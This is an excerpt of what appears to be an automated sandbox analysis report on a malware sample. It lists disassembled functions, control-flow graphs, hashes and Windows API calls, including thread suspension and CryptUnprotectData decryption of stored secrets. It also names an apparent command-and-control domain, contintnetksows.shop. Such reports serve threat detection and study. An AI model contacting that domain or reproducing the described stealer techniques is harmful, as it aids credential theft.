                    • Part of subcall function 006278C4: _memset.LIBCMT ref: 006278E3
                    • Part of subcall function 0062753D: _memset.LIBCMT ref: 00627557
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: _memset$AddressAllocProcVirtual
                  • String ID: s+b
                  • API String ID: 2209818441-2084237830
                  • Opcode ID: b7b0ef838776a43ef45d350a4612076e952e595f5cd5d980ab373e9b4a5ada2d
                  • Instruction ID: 8072cebca02ffdf8bd29d59e12d35691a1114f9b15f9eebcdf750742111d8737
                  • Opcode Fuzzy Hash: b7b0ef838776a43ef45d350a4612076e952e595f5cd5d980ab373e9b4a5ada2d
                  • Instruction Fuzzy Hash: 1A6239329007228FC798EFB5ECA656E73A3FBC1306F06A62DE44287155DF3459458EC9
                  Function 02D90BD7 Relevance: 6.1, APIs: 4, Instructions: 100threadprocessCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1296 2d90bd7-2d90c1e CreateToolhelp32Snapshot 1299 2d90cf4-2d90cf7 1296->1299 1300 2d90c24-2d90c45 Thread32First 1296->1300 1301 2d90c4b-2d90c51 1300->1301 1302 2d90ce0-2d90cef 1300->1302 1303 2d90cc0-2d90cda 1301->1303 1304 2d90c53-2d90c59 1301->1304 1302->1299 1303->1301 1303->1302 1304->1303 1305 2d90c5b-2d90c7a 1304->1305 1305->1303 1308 2d90c7c-2d90c80 1305->1308 1309 2d90c98-2d90ca7 1308->1309 1310 2d90c82-2d90c96 Wow64SuspendThread 1308->1310 1311 2d90cac-2d90cbe FindCloseChangeNotification 1309->1311 1310->1311 1311->1303
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,02D9071D,?,00000001,?,81EC8B55,000000FF), ref: 02D90C15
                  • Thread32First.KERNEL32(00000000,0000001C), ref: 02D90C41
                  • Wow64SuspendThread.KERNEL32(00000000), ref: 02D90C94
                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 02D90CBE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID: ChangeCloseCreateFindFirstNotificationSnapshotSuspendThreadThread32Toolhelp32Wow64
                  • String ID:
                  • API String ID: 376097663-0
                  • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                  • Instruction ID: 0a8cb85a40da39f5987f9d696f75060c16fd6001dbecbc04a4b44d1fcf6dd096
                  • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                  • Instruction Fuzzy Hash: 3A41ED75A00108AFDB18DFA8D490FADB7F6EF88300F108168E6159B794DB34EE45CB94
                  Function 031DF9F6 Relevance: 4.5, Strings: 3, Instructions: 738COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1317 31df9f6-31dfa69 1318 31dfa6b 1317->1318 1319 31dfab7-31dfb07 1317->1319 1320 31dfa70-31dfab5 1318->1320 1321 31dfb09 1319->1321 1322 31dfb52-31dfb5c 1319->1322 1320->1319 1320->1320 1323 31dfb10-31dfb50 1321->1323 1324 31dfb5e-31dfb61 1322->1324 1325 31dfb7b-31dfb83 1322->1325 1323->1322 1323->1323 1326 31dfb70-31dfb79 1324->1326 1327 31dfb9d 1325->1327 1328 31dfb85-31dfb89 1325->1328 1326->1325 1326->1326 1330 31dfba0-31dfba8 1327->1330 1329 31dfb90-31dfb99 1328->1329 1329->1329 1331 31dfb9b 1329->1331 1332 31dfbbb-31dfbc6 1330->1332 1333 31dfbaa-31dfbab 1330->1333 1331->1330 1335 31dfbc8-31dfbc9 1332->1335 1336 31dfbdb-31dfcb6 1332->1336 1334 31dfbb0-31dfbb9 1333->1334 1334->1332 1334->1334 1337 31dfbd0-31dfbd9 1335->1337 1338 31dfcf8-31dfd2d 1336->1338 1339 31dfcb8 1336->1339 1337->1336 1337->1337 1341 31dfd2f 1338->1341 1342 31dfd72-31dff79 call 31dbe80 1338->1342 1340 31dfcc0-31dfcf6 1339->1340 1340->1338 1340->1340 1343 31dfd30-31dfd70 1341->1343 1346 31dff7b 1342->1346 1347 31dffc5-31e001e 1342->1347 1343->1342 1343->1343 1350 31dff80-31dffc3 1346->1350 1348 31e006a-31e0072 1347->1348 1349 31e0020-31e0068 1347->1349 1351 31e008b-31e0093 1348->1351 1352 31e0074-31e0078 1348->1352 1349->1348 1349->1349 1350->1347 1350->1350 1354 31e00ab-31e00b9 1351->1354 1355 31e0095-31e0096 1351->1355 1353 31e0080-31e0089 1352->1353 1353->1351 1353->1353 1357 31e00cb-31e00d3 1354->1357 1358 31e00bb-31e00bf 1354->1358 1356 31e00a0-31e00a9 1355->1356 1356->1354 1356->1356 1360 31e00eb-31e01c6 1357->1360 1361 31e00d5-31e00d6 1357->1361 1359 31e00c0-31e00c9 1358->1359 1359->1357 1359->1359 1363 31e01c8 1360->1363 1364 31e0206-31e023b 1360->1364 1362 31e00e0-31e00e9 1361->1362 1362->1360 1362->1362 1367 31e01d0-31e0204 1363->1367 1365 31e023d-31e023f 1364->1365 1366 31e0280-31e0297 call 31dbe80 1364->1366 1368 31e0240-31e027e 1365->1368 1370 31e029c-31e02b2 1366->1370 1367->1364 1367->1367 1368->1366 1368->1368
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID: RMBC$contintnetksows.shop$ISO
                  • API String ID: 0-2621096283
                  • Opcode ID: ad90a8e9bca27d5b074743c408b61d282c6c7059ff90e62dc7c044138fb54429
                  • Instruction ID: 3df96b0031325a5109b9867d61b4b40b8590b0b38a50309f5ac879209c4ff4ac
                  • Opcode Fuzzy Hash: ad90a8e9bca27d5b074743c408b61d282c6c7059ff90e62dc7c044138fb54429
                  • Instruction Fuzzy Hash: 3E42ACB1500B419FD724CF29C985712BBF1FF4A204F18869CE8EA8BB95E334E815CB95
                  Function 031E0FCA Relevance: 4.1, Strings: 3, Instructions: 347COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1426 31e0fca-31e101a call 31fe9a0 call 31d9c20 call 3203c60 1433 31e101c-31e101f 1426->1433 1434 31e1067-31e1093 1426->1434 1435 31e1020-31e1065 1433->1435 1436 31e10d7-31e112b 1434->1436 1437 31e1095 1434->1437 1435->1434 1435->1435 1439 31e112d-31e112f 1436->1439 1440 31e1170-31e1178 1436->1440 1438 31e10a0-31e10d5 1437->1438 1438->1436 1438->1438 1441 31e1130-31e116e 1439->1441 1442 31e117a-31e117f 1440->1442 1443 31e118b-31e1196 1440->1443 1441->1440 1441->1441 1446 31e1180-31e1189 1442->1446 1444 31e11ab-31e11b9 1443->1444 1445 31e1198-31e1199 1443->1445 1448 31e11cb-31e11d3 1444->1448 1449 31e11bb-31e11bf 1444->1449 1447 31e11a0-31e11a9 1445->1447 1446->1443 1446->1446 1447->1444 1447->1447 1451 31e11eb-31e11f9 1448->1451 1452 31e11d5-31e11d6 1448->1452 1450 31e11c0-31e11c9 1449->1450 1450->1448 1450->1450 1454 31e120d 1451->1454 1455 31e11fb-31e11ff 1451->1455 1453 31e11e0-31e11e9 1452->1453 1453->1451 1453->1453 1457 31e1210-31e1218 1454->1457 1456 31e1200-31e1209 1455->1456 1456->1456 1458 31e120b 1456->1458 1459 31e123d 1457->1459 1460 31e121a-31e1221 1457->1460 1458->1457 1461 31e1243-31e131c 1459->1461 1462 31e1230-31e1239 1460->1462 1464 31e131e-31e131f 1461->1464 1465 31e1358-31e139c 1461->1465 1462->1462 1463 31e123b 1462->1463 1463->1461 1466 31e1320-31e1356 1464->1466 1467 31e139e-31e139f 1465->1467 1468 31e13d9-31e13ef call 31dbe80 1465->1468 1466->1465 1466->1466 1469 31e13a0-31e13d7 1467->1469 1471 31e13f4-31e140e 1468->1471 1469->1468 1469->1469
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Object$Select$CallbackDeleteDispatcherUser
                  • String ID: contintnetksows.shop$uw$y{
                  • API String ID: 2657709779-899352108
                  • Opcode ID: 63af5b7c8ed473579d698d31b21df5cd31948e14a4bd99752e6d9d94867a3e28
                  • Instruction ID: fe31c5520e710bc27442e4764f14965186fe23bf80e20abde97db64132b13d2e
                  • Opcode Fuzzy Hash: 63af5b7c8ed473579d698d31b21df5cd31948e14a4bd99752e6d9d94867a3e28
                  • Instruction Fuzzy Hash: 96D14574104B82AFD325CF29C5A0716FBF2BF4A704F18895CD4AA4BB56C336B815CB94
                  Function 02D90A87 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103threadCOMMON
                  Download Yara Rule
                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000), ref: 02D90B53
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateThread
                  • String ID: ,
                  • API String ID: 2422867632-3772416878
                  • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                  • Instruction ID: 95e83e816a88bc31f0abe491cca7650f6d7a7aefcca3412fecfee3cc8aa7a175
                  • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                  • Instruction Fuzzy Hash: CF41C674A00209EFDB04CF98D994BAEB7B1FF88319F208198E5156B390D771AE81CF94
                  Function 031D4D30 Relevance: 2.9, Strings: 2, Instructions: 415COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID: )$IEND
                  • API String ID: 0-707183367
                  • Opcode ID: 2209d2ab8b4121cab1ea8523945c1eb9312c966ad4e3570247d75ba94741ba63
                  • Instruction ID: eb3f2871500ce2ed0649ed095e0b82a855a2c22395703423dfe6fa164ae00e60
                  • Opcode Fuzzy Hash: 2209d2ab8b4121cab1ea8523945c1eb9312c966ad4e3570247d75ba94741ba63
                  • Instruction Fuzzy Hash: 2FF1D2B5A087009FD324CF29D85575BBBE1BF9A304F04892DE8D59B381D779E909CB82
                  Function 02D904C7 Relevance: 1.9, APIs: 1, Instructions: 399threadCOMMON
                  Download Yara Rule
                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 02D9076A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateThread
                  • String ID:
                  • API String ID: 2422867632-0
                  • Opcode ID: 1bc6a5954882d22d8f918de821c613969b7efc7e6fd570c8cab578f13679f9b1
                  • Instruction ID: b22b8e946993d022a20d709458ab6102155ed77cdb3cb641c85996536ed3ceae
                  • Opcode Fuzzy Hash: 1bc6a5954882d22d8f918de821c613969b7efc7e6fd570c8cab578f13679f9b1
                  • Instruction Fuzzy Hash: 0B12C2B1E00219DBDB14DF98D990BADBBB2FF48304F2482A9E515AB385C735AE41CF54
                  Function 031E6FD2 Relevance: 1.7, APIs: 1, Instructions: 157encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 031E7197
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: CryptDataUnprotect
                  • String ID:
                  • API String ID: 834300711-0
                  • Opcode ID: 8e42c208213ec72bc20f65617e291ecc5528d1f37573dcac2caa33f63c3325ba
                  • Instruction ID: 31197f7c52afe0e16117a284dd8f7c82f62415ae5df75cff490036452b1a20b3
                  • Opcode Fuzzy Hash: 8e42c208213ec72bc20f65617e291ecc5528d1f37573dcac2caa33f63c3325ba
                  • Instruction Fuzzy Hash: D751D3B29087818FD724CB28C09162BBBF2AF9A205F184D6DE5D587382E736D945CB42
                  Function 031F1020 Relevance: 1.6, Strings: 1, Instructions: 374COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: G@AB
                  • API String ID: 2994545307-648899744
                  • Opcode ID: e733b6b45d3334533c985bcc91cef0e7c0d7d3de0bf627d1dc3c09b8a6ea88ab
                  • Instruction ID: 859f654a890a422d11bb9d28a8e5b9853b08337aedd116ac229c69297da74099
                  • Opcode Fuzzy Hash: e733b6b45d3334533c985bcc91cef0e7c0d7d3de0bf627d1dc3c09b8a6ea88ab
                  • Instruction Fuzzy Hash: 23C1DD71A08301EFD314DF68C890B6BB7E2EB99354F29892CE6C58B351E335D845CB92
                  Function 03208085 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                  Download Yara Rule
                  APIs
                  • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 032080F1
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: 2383073829ea5ff8ddc2bfb4e642d14e4b03da557fe7884b94536ad8edf543ec
                  • Instruction ID: b1cf8b3fee17b408882cbe6abf956bac6b2985c3223a1299d9b0e49323a77572
                  • Opcode Fuzzy Hash: 2383073829ea5ff8ddc2bfb4e642d14e4b03da557fe7884b94536ad8edf543ec
                  • Instruction Fuzzy Hash: 87110831A193808FD3168F24DC606A5FBB2EF97310B2E459EC5C58B293C2396C1ACB91
                  Function 03205F22 Relevance: 1.5, APIs: 1, Instructions: 14memoryCOMMON
                  Download Yara Rule
                  APIs
                  • RtlAllocateHeap.NTDLL(?,00000000), ref: 03205F26
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: cca9a57287b4f57e5e2a9a37fddf04ced8e2c1941aff39f5858c212d0a0e4914
                  • Instruction ID: 8585ed50d3cda53513e2c1f6f4f025e32c81e242eb10e03fad9211a18a6216a1
                  • Opcode Fuzzy Hash: cca9a57287b4f57e5e2a9a37fddf04ced8e2c1941aff39f5858c212d0a0e4914
                  • Instruction Fuzzy Hash: 37C08C3068820046E10CEB19AD00B32A26E9BE7304F20E10CD5092328AD8B0E802402C
                  Function 03208120 Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LdrInitializeThunk.NTDLL(0320B17C,?,00000006,00120089,?,00000018,A0A1AEAF,00000000,031E5F3E), ref: 03208146
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                  • Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
                  • Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                  • Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82
                  Function 0320B1A0 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: @
                  • API String ID: 2994545307-2766056989
                  • Opcode ID: aff78eb73bff718ecaac5b959fe771bb9abc2926e36f3a66e4f1afb3e10aa60e
                  • Instruction ID: a91f1749179660f906da95eb3b9ff9bc42d28ddc6806e4775b82c8b4c651eb63
                  • Opcode Fuzzy Hash: aff78eb73bff718ecaac5b959fe771bb9abc2926e36f3a66e4f1afb3e10aa60e
                  • Instruction Fuzzy Hash: 9541CFB15183018FD724CF28C881B2BB7F5EF95328F188A2CE4959B292E775D549CB86
                  Function 0320AFE0 Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: @
                  • API String ID: 2994545307-2766056989
                  • Opcode ID: 4e24538ab8187c7c80a089f648dd5e6f7626d3fc365c3d5183bbf1edf9b40ad6
                  • Instruction ID: 80088b42e5259c5e0e85af59b0c7def8a7e3a4b79ea4ad7ca7ae96c37c66def7
                  • Opcode Fuzzy Hash: 4e24538ab8187c7c80a089f648dd5e6f7626d3fc365c3d5183bbf1edf9b40ad6
                  • Instruction Fuzzy Hash: 8641F3B19183019FD714CF18C881B6BB7F6FF95314F188A1CE4A58B292E335D558CB82
                  Function 00624B77 Relevance: .3, Instructions: 262COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: _memset
                  • String ID:
                  • API String ID: 2102423945-0
                  • Opcode ID: ddcb5568c7920c9e8d02870415a23d607a7cf6ffec8b9a475cd9f13034464100
                  • Instruction ID: 1fafddd87d3428333240a6b28c834b3d00c6fa4940803c3ae78e5fe07bc09740
                  • Opcode Fuzzy Hash: ddcb5568c7920c9e8d02870415a23d607a7cf6ffec8b9a475cd9f13034464100
                  • Instruction Fuzzy Hash: 9A910832604B218BC728EF78E866AAE77A3BF84301F41492DE49787251DF346945CF95
                  Function 031E6CA8 Relevance: .2, Instructions: 156COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 37353a1083d96d80b64e615012713598bfdf07aec51fab7fed05927f9d83fa56
                  • Instruction ID: fe2ebc4700af77377fa9b9c60b3dec1af3430afd842dd6fad37bc46816a70769
                  • Opcode Fuzzy Hash: 37353a1083d96d80b64e615012713598bfdf07aec51fab7fed05927f9d83fa56
                  • Instruction Fuzzy Hash: 85418DB19087108BD724CF68C84162BF3F5FF9A210F99892CE8E997250E736E845C792
                  Function 031E61E0 Relevance: .1, Instructions: 146COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e1fc2eed256e92537bac5fd5b8091c2d9439728912e067fb15d4a26daf00d30c
                  • Instruction ID: 5454cb29bb999cd0adc47bb2eba512174f7ae99e0d0f7726c8550c6c309ae400
                  • Opcode Fuzzy Hash: e1fc2eed256e92537bac5fd5b8091c2d9439728912e067fb15d4a26daf00d30c
                  • Instruction Fuzzy Hash: A251DF745087008FD324CF24D851BABB7E8FFC9314F448A1CE8AA5B281D775A901CB92
                  Function 031E64F3 Relevance: .1, Instructions: 118COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dc6057c2dec0c11ec337063b5fc8865ba89929e6884a2c2891ac3a1fa0c3f529
                  • Instruction ID: b0c3f1e9c1b8cfc202b7804a2801311c3622e03fc3b5b8b8e8bc857eadb417cf
                  • Opcode Fuzzy Hash: dc6057c2dec0c11ec337063b5fc8865ba89929e6884a2c2891ac3a1fa0c3f529
                  • Instruction Fuzzy Hash: CF4188746083118BD728CF18C86076BB7E2FF8A344F488A1DE8E55B381E7B9D545CB96
                  Function 031E60E2 Relevance: .1, Instructions: 60COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0ab283f54214ab17cb4dddf9ec3d889b2a1667a10d8909e90096d83a496d2809
                  • Instruction ID: 6719d57ad6e9e094a6c01757b7e4ca8ff0551d9b5bf2924f174885d39211e79e
                  • Opcode Fuzzy Hash: 0ab283f54214ab17cb4dddf9ec3d889b2a1667a10d8909e90096d83a496d2809
                  • Instruction Fuzzy Hash: BC119D34A08701ABC70DCF04D5A063FB7E2EBD9608F588A1CE48A53242C731ED458B86
                  Function 031E6E60 Relevance: .0, Instructions: 30COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5c2587fb7823da486c94a2042c32ebd6115bb7a471c39eb45b59d4afaa6cc8b2
                  • Instruction ID: b38727743fc38fa7aa0d9e2449e64d1ad33f56af52e536ca9b7bd54f35a198a9
                  • Opcode Fuzzy Hash: 5c2587fb7823da486c94a2042c32ebd6115bb7a471c39eb45b59d4afaa6cc8b2
                  • Instruction Fuzzy Hash: F3F03A78505347DBCB00CF14C4405BABBB1FF59284F04185DF98097260E736C965C792
                  Function 031E3031 Relevance: .0, Instructions: 25COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b749e5c44071283b4941b32d201a2b9210d51e5f12d375468503ab6258c4da0e
                  • Instruction ID: 741f73927c2667a24f51f03fc811537533c691c5e9a3530509863acefdcff470
                  • Opcode Fuzzy Hash: b749e5c44071283b4941b32d201a2b9210d51e5f12d375468503ab6258c4da0e
                  • Instruction Fuzzy Hash: F2E04F79654700E78A05FF10955163EF371AB8F209B442D99E4A7AB241CB219402CB8A
                  Function 031DA320 Relevance: 74.3, APIs: 2, Strings: 40, Instructions: 842libraryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 31da320-31da470 call 31df9c0 * 2 6 31da4cf-31da50b LoadLibraryExW call 32073b0 0->6 7 31da472-31da47b 0->7 12 31da50d-31da51a 6->12 13 31da51f-31da6c5 call 320a3d0 * 12 6->13 8 31da47d-31da4c2 7->8 8->8 10 31da4c4-31da4cd 8->10 10->6 16 31daecb-31daeda 12->16 41 31da6c7-31da6db 13->41 43 31da6dd-31da6e6 41->43 44 31da6eb-31da727 call 3204470 41->44 47 31da843-31da847 43->47 54 31da729-31da733 44->54 47->16 49 31da84d-31daa67 GetProcessVersion call 31d8b90 47->49 59 31daaaf-31daacd call 31db5c0 49->59 60 31daa69 49->60 54->54 56 31da735-31da752 54->56 57 31da754-31da75d 56->57 58 31da7c0-31da7d1 call 31daee0 56->58 61 31da75f-31da762 57->61 69 31da7d6-31da7db 58->69 71 31daacf 59->71 72 31daad4-31dab96 59->72 64 31daa6b-31daaab 60->64 66 31da769-31da7be call 31df840 61->66 67 31da764-31da767 61->67 64->64 65 31daaad 64->65 65->59 66->58 66->61 67->58 73 31da7dd-31da80b 69->73 74 31da7df-31da809 call 31db580 69->74 76 31daec0-31daec4 71->76 77 31dab98 72->77 78 31dabe1-31dac07 call 31dbe30 72->78 81 31da812-31da81a 73->81 74->81 76->16 82 31dab9a-31dabdd 77->82 91 31dac0e-31dac52 78->91 92 31dac09 78->92 89 31da81c-31da823 81->89 90 31da825-31da82b 81->90 82->82 86 31dabdf 82->86 86->78 89->90 94 31da82d-31da83c 90->94 95 31da841 90->95 97 31dac54 91->97 98 31daca0-31dacc3 call 31dbe30 91->98 96 31dae83-31dae9c call 3205f70 92->96 94->41 95->47 113 31daead-31daeb4 96->113 114 31dae9e-31daeab 96->114 102 31dac56-31dac96 97->102 107 31dae7f-31dae81 98->107 108 31dacc9-31dacf6 call 31d8c30 98->108 102->102 103 31dac98-31dac9e 102->103 103->98 107->96 119 31dacfc-31dad0d 108->119 117 31daeb6-31daebc 113->117 114->117 117->16 118 31daebe 117->118 118->76 120 31dad1c-31dad3a 119->120 121 31dad0f-31dada5 119->121 127 31dad3c-31dad42 120->127 128 31dad6a 120->128 130 31dada7-31dadb1 121->130 127->128 131 31dad44-31dad68 127->131 129 31dad6c-31dad8a 128->129 129->119 130->130 132 31dadb3-31dadcf 130->132 131->129 133 31dae3c-31dae59 call 31daee0 132->133 134 31dadd1-31dadd3 132->134 143 31dae5d-31dae78 call 31db580 133->143 144 31dae5b 133->144 135 31dadd5-31daddb 134->135 137 31daddd-31daddf 135->137 138 31dade1-31dae37 call 31df840 135->138 140 31dae39 137->140 138->135 138->140 140->133 146 31dae7b-31dae7d 143->146 144->146 146->107
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
